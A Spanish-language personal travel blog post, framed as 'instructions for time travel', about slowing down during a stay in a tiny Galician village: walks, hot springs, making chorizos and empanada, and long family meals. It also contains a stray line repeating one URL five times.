Instrucciones para viajar en el tiempo

Pensaba que viajar en el tiempo quedaba sólo para las películas de ciencia ficción, al menos hasta nuevo aviso. Sin embargo, en nuestro último viaje descubrí que viajar en el tiempo es posible. Volvimos hacia atrás unos cuarenta años, y hemos vuelto intactos. Las extremidades en sus posiciones originales, la cabeza sobre los hombros, y el estómago lleno. Eso sí.

Paso 1: Tomar cualquier medio de transporte (autobús, tren, avión…) con destino Galicia.

Nosotros tomamos un autobús que viajaba durante la noche para poder aprovechar más el poco tiempo del que disponíamos. Llegamos a las cuatro de la mañana a la estación de autobuses de Santiago de Compostela que estaba cerrada a cal y canto. Fuimos pocos los que llegamos hasta aquí. De esos pocos, la mayoría se fueron a sus coches, alguien les estaba esperando o se tomaron un taxi. Así es que quedó solamente una chica, que andaba con una pierna escayolada y muletas que tenía que esperar a que su novio viniera a buscarla. Decidimos quedarnos a hacerle compañía, porque no era un lugar ideal para esperar sola y nosotros no teníamos ninguna prisa. Mientras estábamos ahí esperando a que llegase su novio, otro chico que había venido en el autobús se acercó a preguntarnos en inglés a ver si conocíamos algún hostal cerca. Con la ayuda de un taxista le indiqué hacia dónde podría encontrar alguno. Al de un rato la chica se fue y nosotros, mochila al hombro, caminamos al centro de Santiago para aprovechar el tiempo que teníamos hasta que el amigo de E. nos viniera a buscar.

El centro de la ciudad estaba desierto. La ciudad era nuestra completamente. Estábamos llegando a la imponente plaza del Obradoiro sin habernos cruzado con un alma. Justo antes de poner un pie sobre la magnífica plaza, el chico de antes apareció ahí. Empezamos a hablar, él tenía que esperar hasta las doce a su autobús a Porto y nosotros hasta las ocho. Así que empezamos a vagar por la ciudad juntos, conversando del mundo, de la vida, de los viajes, de fotografía. Era indio pero estaba viviendo en Londres, una de entre tantas (Atenas, Singapur, Chicago… y otras que no consigo recordar). A las siete y media conseguimos encontrar un bar abierto, desayunamos uno de los cafés más ricos de mi vida y nos despedimos.

Paso 2: aterrizar en un pueblo perdido de menos de 100 habitantes.

Debe ser uno de los pasos más importantes para que este viaje en el tiempo se haga efectivo. Sólo si nos movemos de una ciudad o pueblo grande, donde la velocidad de la vida es tan grande, hacia una de estas aldeas, es cuando conseguiremos sentir que el tiempo se detiene. O, dicho de otra forma, viajar hacia atrás en el tiempo.

Nosotros aterrizamos en Fontefria, un pueblo de la provincia de Ourense. Un pueblo de unos 75 habitantes oficialmente, aunque no conseguimos ver a más de diez.

Paso 3: Olvidar la velocidad, olvidar el tiempo, disfrutar. 

Deben haber sido las primeras vacaciones en las que me dejé llevar de esta forma, en las que conseguí no estresarme por conocerlo todo y me dediqué a disfrutar y dejarme llevar. Hubo un trabajo previo, esta vez iba concienciada de que íbamos a la casa de un amigo de E. y que, entonces, tendríamos que adaptarnos a sus planes. Tan mentalizada estaba que ni siquiera busqué cosas para ver o hacer en la zona. Me dispuse a relajarme al completo, esta vez de verdad.

Una vez alcanzadas las condiciones necesarias para viajar en el tiempo hay varias actividades recomendadas que facilitarán el viaje:

  • Leer y escribir. A todas horas, sea donde sea. Y si es delante del fuego, mucho mejor (acá les cuento mi nuevo amor por éste). Quizá hasta me guste un poco más el invierno. Y todo por culpa del fuego de la chimenea. Si los inviernos me esperasen con chimeneas y libros y cuadernos es posible que los buscase con más ganas.

  • Pasear por la naturaleza. Ésta tiene la capacidad de hacernos viajar en el tiempo, en el espacio, incluso hacia la posibilidad de mundos mágicos. En éste paseo que hicimos hacia una cascada parecía que a cada paso un gnomo iba a aparecer en el camino, para llevarnos de la mano a su casa escondida en algún árbol. Al final del recorrido una cascada de agua que helaba el ambiente, que llenaba el aire con su sonido y que invitaba a relajarse y disfrutar de la magia del lugar.

Otra buena opción es zambullirse en las aguas termales naturales del río Miño. Hay varios baños públicos y algunos privados (que están un poco más preparados pero que son muy económicos). Uno de los baños públicos que vimos tenía este aspecto:

  • Disfrutar de un atardecer. Al menos de uno.

  • Hacer chorizos. Actividad que las familias de la zona llevan realizando de la misma forma muchísimo tiempo y una vez al año, siempre para las fiestas navideñas. Nos pasamos toda una mañana haciendo trabajo en cadena. No sé cuántas personas éramos en total, pero éramos unas cuantas. Algunos se dedicaban en la parte de abajo a rellenar las tripas con la zorza que habían preparado un par de días atrás. Mientras tanto, en el piso de arriba, al calor de una cocina de leña, tres parejas nos dedicábamos a atarlos. Mientras uno separaba la zorza para indicar dónde se debían hacer los nudos, el otro manejaba el hilo para hacer el nudo en el sitio adecuado, bien fuerte y doble. Después de eso había otros que se encargaban de bajarlos y colgarlos en una habitación donde al día siguiente comenzarían a ahumarlos. Para hacer esto debían mantener el fuego encendido durante una semana.

  • Pasar tiempo conversando y disfrutando de la compañía de otras personas. En esta era de la tecnología, a veces pasamos tanto tiempo detrás del ordenador o del móvil que parece que se nos ha olvidado cómo hablar con los que tenemos a nuestro alrededor. Para viajar en el tiempo es necesario dejar el móvil a un lado, mirar a quien tengamos cerca a los ojos y escucharlos.

Reirse juntos (el amigo de E., su prima y la hija de la prima)

  • Comer y cocinar. Esto fue lo que ocupó la mayor parte de nuestro tiempo en el viaje. Las comidas en una mesa donde nunca éramos menos de diez invitaban a las largas sobremesas. Mientras comíamos caldo gallego, cochinillo, cordero o lo que fuera,  las conversaciones de los mayores trataban sobre cómo matar distintos tipos de animales (jabalíes, corzos, cerdos, corderos o vacas) y sobre cómo cocinarlos después (si asados, si adobados, en conserva…). El resto de las conversaciones no podría retransmitirlas, me costaba mucho comunicarme con muchos de ellos a pesar de que supuestamente hablamos el mismo idioma. El vino tinto y blanco hechos en casa -por supuesto- que no faltasen. Rulaba por los vasos como si se tratara de agua.

Comimos pulpo a la gallega y tres platos distintos de carne en un lugar que me cuesta definir. Se encontraba en la planta superior a una carnicería, las mesas corridas y los cuencos de barro para servir el vino.

Y, como broche final, aprendimos a hacer empanada gallega con la abuela de M. (el amigo de E.) que tiene cerca de 100 años. Trabajamos todos en equipo, pero al mando estaba ella.

Y después de haber disfrutado muchísimo, tan sólo queda volver a casa para poder verdaderamente sentir que hemos completado este viaje en el tiempo, este viaje al pasado.

https://cuev.in/aux.php?ver=1.1&ref=zhttps://cuev.in/aux.php?ver=1.1&ref=zhttps://cuev.in/aux.php?ver=1.1&ref=zhttps://cuev.in/aux.php?ver=1.1&ref=zhttps://cuev.in/aux.php?ver=1.1&ref=z

Anuncios

4 comentarios en “Instrucciones para viajar en el tiempo

    1. ¡Muchas gracias por pasar y comentar! Me alegra que te haya gustado… y ya sabes, ahí están las instrucciones para cuando quieras hacerlo realidad (estoy segura de que en casi todos los pueblos pequeños es aplicable la misma regla aunque sea en otra parte del mundo).

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s